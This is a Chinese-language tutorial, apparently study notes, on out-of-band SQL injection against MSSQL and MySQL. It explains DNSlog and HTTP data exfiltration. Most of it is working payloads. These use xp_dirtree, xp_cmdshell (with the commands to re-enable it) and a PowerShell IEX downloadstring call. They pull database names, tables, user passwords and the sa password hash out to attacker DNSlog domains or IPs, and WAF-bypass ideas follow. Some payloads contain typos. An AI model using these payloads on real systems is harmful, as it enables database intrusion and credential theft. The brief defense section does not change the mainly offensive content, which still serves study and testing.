Mssql_Dnslog外带
原理
DNSLOG解释
DNS: 域名解析IP , 用户在浏览器输入一个域名, 靠DNS服务解析域名的真实IP, 访问服务器上相应的服务
DNSLOG: DNS的日志, 存储在DNS 服务器上的域名信息, 记录着用户对域名的访问信息,类似日志文件
DNSLOG利用原理
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带, 原理上只要能进行DNS请求的函数都可能存在DNSlog注入
DNSLOG利用场景
sql注入时, 存在盲注或者延时, 我们获得需要数据就会频繁请求, 最后导致IP 被Ban
sql注入时, 执行命令注入,但是目标站点什么也不显示,无法确定,就可以使用DNSLOG获取回显
函数:
master..xp_dirtree #存储程序, 用于获取所有文件夹的列表命令 exec master..xp_dirtree 'c:\windows'; xp_cmdshell #存储程序, 用于执行命令 DECLARE #创建变量 master.dbo.fn_varbintohexstr(CONVERT(varbinary,(******))) #转环 解释: sql server 中不能直接转十六进制, 需要转到二进制,在转到十六进制
利用xp_dirtree
函数构造
明确master..xp_dirtree如何拼接函数
exec master..xp_dirtree '\\'+user_name()+'.三级DNS地址'-- \\ 表示windows下统一地址符号,用于连接 user_name() 表示当前数据库用户 三级DNS 拼接三级DNS地址将执行结果带出 由于mssql中外带不允许出现除去0-9a-z的其他特殊符号,我们需要对其进行赋予变量 DECLARE @a vaerchar(1000); set @a='\\'+user_name()+'.三级DNS地址'; exec master..xp_dirtree @a; 解释: 创建 变量a, 为变量a 赋予值, 使用exec master..xp_dirtree 执行 对执行语句中的特殊符号进行编码 declare @a varchar(1000); set @a='\\'%2buser_name()%2b'.三级DNS域名'; exec master..xp_dirtree @a; payload ;DECLARE @a varchar(1000);Set @a='\\'%2buser_name()%2b'.dsr7p.f477ch.dnslog.cleverbao.pub';exec master..xp_dirtree @a;--'
处理不能接收特殊服务, 如+-/*等,那么我们就需要进行编码,因为Base64有+号,容易数据丢失,所以我们采用十六进制的方式获取数据
使用函数:(master.dbo.fn_varbintohexstr(CONVERT(varbinary,(******))))
构造payload如下:
;declare @a varchar(1000); set @a = '\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,(@@version))))%2b'.三级dnslog' ;exec master..xp_dirtree @a--
由于varbinary()函数只能执行出32个位字符,无法显示全部,所以需要对查询内容进行截取
使用函数: substring('条件语句',开始,结束)
构造payload
;DECLARE @a varchar(1000); ;Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((***********),1,15))))%2b'.三级dnslog' ;exec master..xp_dirtree @a;-- 获取sa密码payload ;DECLARE @a varchar(1000); ;Set @a='\\'%2b(SELECT TOP 1 substring(master.dbo.fn_varbintohexstr(password_hash),1,60) FROM sys.sql_logins WHERE name='sa')%2b'.三级DNSlog' ;exec master..xp_dirtree @a;--
转码后payload
;DECLARE @a varchar(1000); ;Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((构造条件),1,15))))%2b'.三级dnslog' ;exec master..xp_dirtree @a;--
获取库名
查询库名语法:select top 1name from master..sysdatabases where name not in(select top 1 name from master..sysdatabases) payload
但是无法一次获取全部,需要进行字符串截取修改
;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((select top 1name from master..sysdatabases where name not in(select top 1 name from master..sysdatabases)),1,15))))%2b'.h1b8q0.log.saltor.icu' ;exec master..xp_dirtree @a;--
获取表名
查询库名语法:select top 1table_name from information_sche.tables where table_name not (select top 1table_name from information_sche.tables)
数据带入查询:
payload ;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((select top 1table_name from information_schema.tables where table_name not in (select top 1table_name from information_schema.tables)),1,15))))%2b'.h1b8q0.log.saltor.icu' ;exec master..xp_dirtree @a;--
获取字段名
查询库名语法:select top 1(column_name) from information_schema.columns where table_name=0x7573657273 and column_name not in(select top 1 column_name from information_schema.columns where table_name=0x7573657273') 构造payload ;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((select top 1(column_name) from information_sche.columns where table_name=0x7573657273 and column_name not in(select top 1 column_name from information_schema.columns where table_name=0x7573657273')),1,15))))%2b'.h1b8q0.log.saltor.icu' ;exec master..xp_dirtree @a;--
获取数据
查询语法构造: select top 1 username,password from user where username not in(select top 1 username,password from user) and password not in(select top 1 password from users) 构造payload ;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((select top 1 1,username,password from users where username not in (select top 1 username from users) and password not in(select top 1 password from users))),1,15))))%2b'.h1b8q0.log.saltor.icu' ;exec master..xp_dirtree @a;--
利用xp_cmdshell 外带数据
通过以上案例,我们知道了外带数据的构造,那么是否可以使用xp_cmdshell 外带数据呢?
尝试将payload换成xp_cmdshell外带数据:
;DECLARE @a varchar(1000); Set @a='\\'%2b(master.dbo.fn_varbintohexstr(CONVERT(varbinary,substring((select top 1table_name from information_schema.tables where table_name not in (select top 1table_name from information_schema.tables)),1,15))))%2b'.f7zye0.log.saltor.icu' ;exec master..xp_cmdshell @a;--
问题
报错: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息
解决问题:
执行一下sql语句
exec sp_configure 'show advanced options',1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure;
之后可以执行xp_cmdshell外带数据了
mssql_http外带数据
我们知道通过dnslog 可以外带数据,那么http是否也可以
原理
dnslog 是因为攻击者执行了命令 让存在sql的目标机访问了攻击者定义好的dnslog, 那么同样的, 可以通过命令, 让存在sql注入的目标机访问 攻击者定义好的http端口 进行回弹数据
思考: 通过什么让的方式能够让目标器访问http?使用什么工具呢?
通过ping的方式, 让目标机访问攻击者构造的http,通过powershell 执行命令让目标机访问攻击者构造的IP
函数
DECLARE #定义变量 set #为变量赋值 master..xp_cmdshell #执行cmdshell powershell iex(new-object net.webclient).downloadstring #使用powershell (新建 数组 新建webclinet).download以 String 形式下载请求的资源
条件
前提:开启端口监听,是目标机能够访问到攻击者IP
python3 -m http://192.168.1.1:9000
构造
payload ;DECLARE @okma VARCHAR(8000); SET @okma=(SELECT TOP 1 substring(@@version,1,35)); exec('master..xp_cmdshell"powershell IEX (new-object net.webclient).downloadstring(''http://172.16.12.187:9008/?data='%2b @okma %2b''')"' ) -- 在语法中 @okma 的payload 是可变的 mysql_dnslog外带
原理
因为windows特性可以认为的主动发送请求,所以造成了mysql在windows下注入外带
通过查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。
利用场景
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。
对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。
所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。
利用条件
服务器必须能正常访问联网
mysql的配置文件secure_file_priv=""
读取文件并返回文件内容为字符串。
要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。
函数
和之前的mysql 查询语句一样
load_file()
利用
简单的构造:
select load_file('\\\\dnslog.domain.com') 构造payload load_file(concat('\\\\', version(),'.dnslog.domain.com'))-- a 构造查询语句payload 为避免数据都是需要使用十六进制, 由于url 有字符长度限制64,需要使用到截断方法 and load_file(concat('\\\\', mid(hex(user()),1,60), '.dnslog.domain.com')) -- a 转码后的payload and load_file(concat(0x5C5C5C5C, mid(hex((*************)),1,60), 0x2E646E736C6F672E646F6D61696E2E636F6D))--a
搭建mysql外带环境
在phpstudy的mysql配置文件my.ini 添加 secure-file-priv=""
DNS注入绕过WAF
思路:
各种编码绕过
字母大小写转换让偶共
空格过滤绕过
双关键字绕过
内联注释绕过
采用大佬文章: https://juejin.cn/post/7013334787133964318
总结:
DNS和http外带注入的满足条件都是需要服务器能够联网
DNS和HTTP外带注入一定要使用十六进制编码防止数据丢失
外带数据注入不只可以外带注入,如果在权限足够的情况下,文件也可以
外带数据常用于延时和盲注,方便读取,不会对服务器发送频繁请求,避免过多的流量请求
防御
使用权限划分,
启用WAF 和防火墙等机制
对用户的传参进行严格的过滤
添加白名单与黑名单
转义所有用户提供的输入
思考
什么条件下会使用到外搭数据的攻击
外带数据在什么攻击方式还会利用到?
XXE进阶--OOB攻击
